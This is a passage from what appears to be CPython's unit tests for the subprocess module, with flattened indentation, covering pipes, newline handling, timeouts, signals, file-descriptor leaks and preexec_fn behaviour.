'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# A Python debug build pushes something like "[42442 refs]\n" to stderr
# when the subprocess exits.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen(["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
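# Hedged addition (not part of the original test set; assumes only documented
# subprocess.run() behavior): check=True together with stdout=PIPE on a
# successful command should both avoid raising and capture the child's output.
def test_check_with_capture_stdout(self):
    cp = self.run_python("print('BDFL')", check=True, stdout=subprocess.PIPE)
    self.assertEqual(cp.returncode, 0)
    self.assertIn(b'BDFL', cp.stdout)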
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead captures the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals IntEnum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
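# Helpers for the fd-closing tests below: _save_fds() dups each fd and records
# its inheritable flag so that _restore_fds() can later put the original
# standard streams back after a test has closed or overwritten them.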
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
